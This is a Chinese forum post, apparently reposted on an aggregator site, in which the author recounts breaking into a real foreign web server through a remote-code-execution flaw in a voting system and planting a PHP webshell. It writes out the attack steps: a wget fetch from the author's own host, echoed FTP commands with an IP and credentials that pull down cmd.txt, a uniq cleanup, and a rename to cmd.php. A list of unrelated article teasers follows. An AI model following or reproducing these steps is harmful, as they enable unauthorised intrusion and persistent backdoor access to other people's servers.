linux php 如何上传webshell,linux+apache+php的一次拿webshell的心得

首先俺先声明俺是个菜鸟,俺虽然是菜鸟但俺不会一直是菜鸟的(一旁兄弟喊到:别俺,俺,俺的,说普通话!)。俺,不对,我一直遵照着实践是检验真理的唯一标准这句话学习技术,这不,刚刚实践了一次有了一点小小的心得,拿出来和大家分享一下:)

简单介绍一下背景吧(旁白:我kao,你写小说呢?),我一直想拿一个TK国的肉鸡(没有仇啊,只是从来没拿过,想要!),于是google了一个,然后一阵狂扫(哎,固有思路的错)废了半天劲,结果是没戏!正准备走的时候发现了它用的一个投票系统,于是满大街找终于找到了下载地址。dwon下来后,开始阅读代码(当时很激动,第一次尝试漏洞发掘!),结果居然被我找到了一个远程代码执行的漏洞,乎乎,赶紧试了一下,成功!看样子,我要发财了。于是看了看safe_mode=OFF,嘿嘿~~可以执行shell命令。下面的思路很显然了,就是拿webshell。原来在win中碰到mssql可以执行命令的情况最简单的办法就是用echo写入一句话后门,于是赶紧找来php的一句话后门,结果一看傻了眼。linux shell中">","

1。使用单引号将要转义的字符包含起来

2。在需要转义的字符前加上“\”符号。

正要兴冲冲地修改一句话后门,才想起来还没看看目标机器的magic_quotes_gpc是怎么设置的。一想到这心里凉了一大节,一般都是ON的啊。实践检验真理,果然被我言中了。因为它一ON,所有的单引号,还有空字符,以及“\”等字符前面又被加上了一个“\”。我的一句后门被改的面目全非还执行个P啊:-(

一条路断了,接着找另一条。想到wget下载的方法,这个以前看过很多前辈用过,于是先看看wget存不存在,如图(图中我是为了方便,自己写的一个exp。):

22525.html=800) window.open('/Article/UploadPic/2007-2/2007210454786.jpg');" src="/Article/UploadPic/2007-2/2007210454786.jpg" οnlοad="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';" border=0>

看样子是存在的。于是把一个执行cmd功能的php文件cmd.php改成cmd.txt上传到自己的web空间(记得要改后缀啊,因为直接请求一个php文件返回的结果是解析过的,肯定不对的了!),在exp环境中输入wget http://www.myhost.com/cmd.txt。结果等了半天却是失败了(后来我又

google了几个有漏洞的站,只有一个使用wget下载成功的。其它的都失败了!:-()

一条路又没了,哎~~~接着想吧!突然想起来原来在win下使用ftp命令上传webshell的方法,于是回忆了一下过程:

1。使用echo命令把ftp指令echo到一个文本文件里

2。使用 ftp的-s选项制订这个文本文件,这样下载的整个过程都不需要人工干预了。

好,说干就干!需要echo的内容如下:

echo open 111.111.111.111 >temp.txt

echo username >>temp.txt

echo passwd >>temp.txt

echo get cmd.txt >>temp.txt

echo bye >>temp.txt

上面的ip和用户名和密码都是假的,你问我为什么?(我kao,我怕哪为大哥把我的ftp给做了:-)实际用的时候换成你自己的就行了,好,开始在exp环境下echo,一会的功夫就echo完了。确保正确我们在cat一下看看吧:cat ./temp.txt,这一cat不要紧,我又惊了一次!里面的每一行都被重复了一次,如图(这个是我事后为了写这个文章重新做的,所以忘了在最前面echo open 111.111.111.111了,大家知道就行!:-)

22525.html=800) window.open('http://forum.eviloctal.com/attachment/Mon_0701/10_72248_1be50d4c79fba15.jpg');" src="http://forum.eviloctal.com/attachment/Mon_0701/10_72248_1be50d4c79fba15.jpg" οnlοad="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';" border=0>

面对这个问题,再次我让我想到在win+mssql情况下也碰到这样的问题,原因是由于对数据库多次查询造成的结果。当时的解决办法有很多,常用的有:

1。如果写入的是一句话后门可以直接echo进去,使用“>”而不是“>>”。

2。写入hget.vbs,用来下载指定的文件。这个时候可以才用“:”符号把各行代码连接起来,一次性写入。

3。或者是用echo把每行代码都echo到一个不同的文件,然后再用copy命令把这些文件的内容连接起来生成新的文件。

还有其它的方法我就不多说了,但很明显,这些方法用在我这里是肯定不行的了!因为我查了一下,cp命令好像不支持“+”连接符。难道没办法了吗?NO!方法是人想出来的,于是乎我查来查去还真让我找到了一个宝贝:uniq命令,这个是linux shell下的自带程序,功能很单一,但恰恰是我们需要的——去除重复行。我再kao一次,thank god!命令帮助如下:

QUOTE:

$ uniq --help

Usage: uniq [OPTION]... [INPUT [OUTPUT]]

Discard all but one of successive identical lines from INPUT (or

standard input), writing to OUTPUT (or standard output).

Mandatory arguments to long options are mandatory for short options too.

-c, --count       prefix lines by the number of occurrences

-d, --repeated     only print duplicate lines

-D, --all-repeated[=delimit-method] print all duplicate lines

delimit-method={none(default),prepend,separate}

Delimiting is done with blank lines.

-f, --skip-fields=N   avoid comparing the first N fields

-i, --ignore-case   ignore differences in case when comparing

-s, --skip-chars=N   avoid comparing the first N characters

-u, --unique       only print unique lines

-w, --check-chars=N   compare no more than N characters in lines

--help   display this help and exit

--version output version information and exit

A field is a run of whitespace, then non-whitespace characters.

Fields are skipped before chars.

Report bugs to .

常搞黑的应该能认出大多数单词了,我就不多做介绍了。反正用在我这里,就这么简单一句命令就可以搞定:uniq temp.txt >down.txt,如图:

22525.html=800) window.open('http://forum.eviloctal.com/attachment/Mon_0701/10_72248_9188d83bdf39436.jpg');" src="http://forum.eviloctal.com/attachment/Mon_0701/10_72248_9188d83bdf39436.jpg" οnlοad="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';" border=0>

哈哈,成了吧?下面用法就很简单了,在exp的提示符下输入ftp

下面的工作就好办了,使用mv改个名字就行了:mv ./cmd.txt ./cmd.php

到这里就结束了,我原来在交流版块发过一个求助的帖子,除了几个兄弟回帖外便没有什么价值的东西了。我也是菜鸟,和大多数菜鸟都有一个很不好的习惯:不懂就问。哎~~~其实有些东西不是咱们比老鸟差,而是我们太懒太不知道总结了,所以我们应该是不懂就学,而不是不懂就问!这样,我们才会从菜鸟变成老鸟,才能进步!

上面乃是自己的经验总结,看上去很简单,可是却耗费了我不少精力,所以如果您不喜欢请不要打击我,回个帖鼓励鼓励我,我会很感激的。谢谢!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/551345.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

织梦php重新安装教程,织梦CMS系统后台重装的操作教程

原标题:织梦CMS系统后台重装的操作教程网站在线运行,不可能一点问题都不存在,或者当初的网站设计、架构、功能已经不能满足现在用户的需求,所以我们会对网站做出相应的改动。网站除了前端的改版,还会有后台系统重装、服…

mpu9250姿态融合算法_基于投票方式的机器人装配姿态估计

作者:仲夏夜之星来源:公众号 3D视觉工坊链接:基于投票方式的机器人装配姿态估计论文题目:《Voting-Based Pose Estimation for Robotic Assembly Using a 3D Sensor》这篇文章被发表在2012年的IEEE International Conference on R…

skywalking原理_微服务链路追踪原理

作者:平也来源:关爱程序员社区背景介绍在微服务横行的时代,服务化思维逐渐成为了程序员的基本思维模式,但是,由于绝大部分项目只是一味地增加服务,并没有对其妥善管理,当接口出现问题时&#xf…

文本分析软件_读书笔记:伍多库卡茨质性文本分析:方法、实践与软件使用指南...

读书笔记:伍多库卡茨《质性文本分析:方法、实践与软件使用指南》一、这篇文章、这本书或这篇论文的中心思想、核心观点是什么?核心观点:质性数据如何系统化分析?三大主要方法:主题分析、评估分析和类型建构…

matlab两轮自平衡小车,两轮自平衡小车(全部设计资料+设计分析)

自己做的自平衡小车,基本达到预期效果。制作资料在压缩包里面,供参考。该两轮自平衡小车硬件设计概述:控制器:ATmega16;8MHz;加速度传感器:MMA2260;陀螺仪:EWTS82&#x…

异步fifo_【推荐】数字芯片异步FIFO设计经典论文

之前有一篇文章我已经推荐过了数字芯片跨时钟域设计的经典论文 (【推荐】数字芯片跨时钟域设计经典论文 ),希望看过的读者都有一定的收获。不过有点遗憾的是那片论文中虽然提到了异步FIFO,却没有讲具体的原理和设计细节。本篇文章…

php fuzzy,模糊C均值聚类算法(Fuzzy C-means)

模糊c均值聚类与k均值聚类区别k均值聚类k均值聚类的实现中,把每个样本划分到单一的类别中,亦即是每个样本只能属于一种类别,不能属于多种类别。这样的划分,称为硬划分。模糊c均值均类为了解决硬划分所带来的问题,因此有…

dw新建php文件自动生成html,dw如何新建css规则

1、在菜单中单击“文件”选择“新建”2、在新建文档窗口,选择“空白页”—“HTML”,文档类型选择“XHTML1.0 transitional”,单击“创建”按钮3、将插入点放在文档中,然后在菜单栏单击“格式”,在弹出的下拉菜单中选择“CSS样式”…

oracle获取登录名,oracle如何获取当前登录的用户名

Microsoft Windows [版本 5.2.3790](C) 版权所有 1985-2003 Microsoft Corp.C:/>sqlplusSQL*Plus: Release 9.2.0.1.0 - Production on 星期三 5月 30 00:04:26 2007Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.请输入用户名: scott请输入口令:连…

python实现英文新闻摘要自动提取_Automotive Innovation摘要集系列2:Intelligent and Connected Vehicles...

为便于广大科技工作者更好的了解中国汽车行业首个英文学术期刊《Automotive Innovation》,并更快的定位到自己感兴趣的论文,编辑部把2018-2019年刊出的70篇论文摘要进行集结,并按照节能与环保(Energy-saving & Eco-systems)、智能网联汽车…

linux 改变文件夹属性,技术|在Linux中用chattr和lsattr命令管理文件和目录属性

为了允许添加数据,防止更改或者删除等,文件和文件夹可以设定了特定的控制属性。例如,你可以在关键的系统文件或者文件夹中启用属性,然后没有任何用户,包括root,可以删除或者修改它,比如不允许使…

linux 系统盘无法ls,系统故障排除

1.系统故障排除1)模拟磁盘/dev/sda的MBR故障,并执行修复01.备份磁盘/dev/sda的MBR扇区选择一个/dev/sda以外的文件系统(比如/dev/sdb1)来存放备份文件:[rootsvr5 ~]# df -hT/home//选择/dev/sdb1存放备份文件系统 类型 容量 已用 可…

docker公共存储库_查找并修复docker镜像安全漏洞

容器的出现使开发团队可以创建沙盒环境,以在其中运行和测试应用程序,容器主要由从 docker hub 或其他公共镜像存储库提取的开源镜像组成。但是这些开源镜像有时可能包含一些漏洞,这些漏洞可能会危害容器的安全,进而危害其主机/服务…

linux全过程图解图片,安装 Mandriva Linux全过程《图解》

wide 于 2006-02-26 10:29:58发表:设定帐号Mandriva 是一个可供多人使用的作业系统,使用者必须先在系统中拥有帐号才可以使用。而登入时,则必须输入帐号及密码,验证无误后方可进入。 本章将介绍如何在安装时设定使用者帐号及密码。何谓系统管…

c语言程序编写一朵花,一朵花(中英双语)

一朵花A Flower作者|白鹤清泉(Baihe Qingquan)英译|周柯楠(Zhou Kenan)轻轻地走近你的世界Gently I approach your world默默地与你对视Looking you in the eye silently我用眼睛嘴唇与你贴近I keep close to you with my eyes and lips只为听到你芬芳的…

硬解析优化_72最近一次现场生产系统优化的成果与开发建议

上周给南京某客户一个重要业务系统的数据库做优化,能实施的马上做了实施,优化前后性能对比非常明显,系统最为严重的IO负载过重问题基本得到解决:优化前一天的物理读是48亿次,优化后是15亿次,效果那是刚刚的…

XM7 FOR ANDROID,视频剪辑制作app-视频剪辑制作xm8.0安卓版-蜻蜓手游网

视频剪辑制作是一款很好用的手机视频编辑软件,在这里你可以进行视频剪辑、制作字幕、背景音乐制作等,让你可以轻松的制作视频,需要视频剪辑制作的就来蜻蜓手游网下载吧!软件功能【背景配乐】给视频添加背景音乐,支持MP…

混凝土墙开洞_易县混凝土剪力墙切割常见问题

易县混凝土剪力墙切割常见问题北京专业切割 承接水泥地面切割路面切割 混凝土地面切割 地面切割开线槽 楼板切割 墙体切割 柱子切割 沥青地面切割 洋灰地面切割 切割开线槽 。是一个以建筑液压钳拆除结构加固和切割拆除、水钻钻孔的综合性公司。加固设计、混凝土外部粘钢加固、…

差分放大电路差模共模公式_差分放大电路对差模信号和共模信号有什么影响?...

现在在应用中使用的放大电路一般都是由各级级联组成的,直接级联的放大电路各级的直流通路相互关联,因而当前级的静态工作点由于某种原因而稍有偏移时,这种缓慢的微小变化就会逐级影响,致使放大器的输出端产生较大的电压漂移&#…

html本地载入缓存文件,Flutter中如何加载并预览本地的html文件的方法

搜索热词直接进入主题,大概步骤如下在 assets 创建需要访问 html 文件,如下这里创建一个files文件夹,专门来放这些静态 html 文件.在 pubspec.yaml 中配置访问位置assets:- assets/images/- assets/files/在 pubspec.yaml 添加 webview_flutt…